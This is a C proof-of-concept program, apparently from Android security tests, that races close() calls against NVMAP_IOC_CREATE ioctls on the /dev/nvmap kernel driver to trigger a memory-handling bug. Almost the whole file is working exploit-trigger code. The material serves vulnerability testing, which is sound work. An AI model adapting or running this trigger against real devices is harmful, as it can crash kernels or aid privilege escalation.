1 /* 2 * Copyright (C) 2017 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 #define _GNU_SOURCE 17 #include <stdlib.h> 18 #include <errno.h> 19 #include <unistd.h> 20 #include <stdio.h> 21 #include <dirent.h> 22 #include <string.h> 23 #include <sys/stat.h> 24 #include <sys/ioctl.h> 25 #include <stdio.h> 26 #include <string.h> 27 #include <dlfcn.h> 28 #include <sys/time.h> 29 #include <sys/mman.h> 30 #include <sys/syscall.h> 31 #include <sys/resource.h> 32 #include <fcntl.h> 33 #include <pthread.h> 34 #include <unistd.h> 35 #include <sched.h> 36 37 #define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29) 38 #define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28) 39 #define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27) 40 #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0) 41 42 #define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1) 43 44 /* allocation flags */ 45 #define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0) 46 #define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0) 47 #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0) 48 #define NVMAP_HANDLE_CACHEABLE (0x3ul << 0) 49 #define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0) 50 51 #define NVMAP_HANDLE_SECURE (0x1ul << 2) 52 #define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3) 53 #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4) 54 #define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5) 55 #define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6) 56 #define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7) 57 58 struct nvmap_handle_param { 59 __u32 handle; /* nvmap handle */ 60 __u32 param; /* size/align/base/heap etc. */ 61 unsigned long result; /* returns requested info*/ 62 }; 63 64 struct nvmap_create_handle { 65 union { 66 __u32 id; /* FromId */ 67 __u32 size; /* CreateHandle */ 68 __s32 fd; /* DmaBufFd or FromFd */ 69 }; 70 __u32 handle; /* returns nvmap handle */ 71 }; 72 73 struct nvmap_alloc_handle { 74 __u32 handle; /* nvmap handle */ 75 __u32 heap_mask; /* heaps to allocate from */ 76 __u32 flags; /* wb/wc/uc/iwb etc. */ 77 __u32 align; /* min alignment necessary */ 78 }; 79 80 #define NVMAP_IOC_MAGIC 'N' 81 #define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle) 82 #define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param) 83 #define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle) 84 #define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle) 85 #define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4) 86 #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle) 87 #define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle) 88 int g_fd = -1; 89 static pthread_cond_t cond = PTHREAD_COND_INITIALIZER; 90 static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER; 91 struct nvmap_create_handle* g_allocation = NULL; 92 struct nvmap_create_handle g_allocation_dup; 93 94 int open_driver() { 95 char* dev_path = "/dev/nvmap"; 96 g_fd = open(dev_path, O_RDWR); 97 if (g_fd < 0) { 98 printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno); 99 } else { 100 printf("[*] open file(%s) succ!\n", dev_path); 101 } 102 return g_fd; 103 } 104 105 void trigger_nvmap_create() { 106 ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation); 107 } 108 109 void trigger_nvmap_create_dup(int fd) { 110 g_allocation_dup.fd = fd; 111 ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup); 112 } 113 114 void trigger_nvmap_alloc() { 115 struct nvmap_alloc_handle alloc = {0}; 116 alloc.align = 0x1000; 117 alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC; 118 alloc.flags = NVMAP_HANDLE_ZEROED_PAGES; 119 alloc.handle = g_allocation->handle; 120 ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc); 121 } 122 123 void trigger_nvmap_free(int fd) { 124 ioctl(g_fd, NVMAP_IOC_FREE, fd); 125 } 126 127 void setup_privi_and_affinity(int privi, unsigned long cpu_mask) { 128 setpriority(PRIO_PROCESS, gettid(), privi); 129 130 /* bind process to a CPU*/ 131 if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) { 132 } 133 } 134 135 void prepare_data() { 136 void* data = (void *) memalign(0x1000, 4 * 0x1000); 137 //void* data = malloc(0x10000); 138 printf("[*] data = %p\n", data); 139 g_allocation = (struct nvmap_create_handle*)data; 140 g_allocation->size = 1024; 141 g_allocation->handle = -1; 142 mprotect(data, 0x1000, PROT_READ); 143 printf("[*] mprotect, error = %d\n", errno); 144 } 145 146 void* race_thread(void* arg) { 147 setup_privi_and_affinity(-10, 2); 148 149 pthread_mutex_lock(&mutex); 150 pthread_cond_wait(&cond, &mutex); 151 pthread_mutex_unlock(&mutex); 152 153 while (1) 154 close(1024); 155 } 156 157 int main(int argc, char**argv) { 158 159 setup_privi_and_affinity(-10, 1); 160 161 if (open_driver() < 0) { 162 return -1; 163 } 164 prepare_data(); 165 166 pthread_t tid; 167 pthread_create(&tid, NULL, race_thread, NULL); 168 usleep(100 * 1000); 169 170 pthread_cond_signal(&cond); 171 usleep(20); 172 while (1) { 173 trigger_nvmap_create(); 174 } 175 return 0; 176 } 177
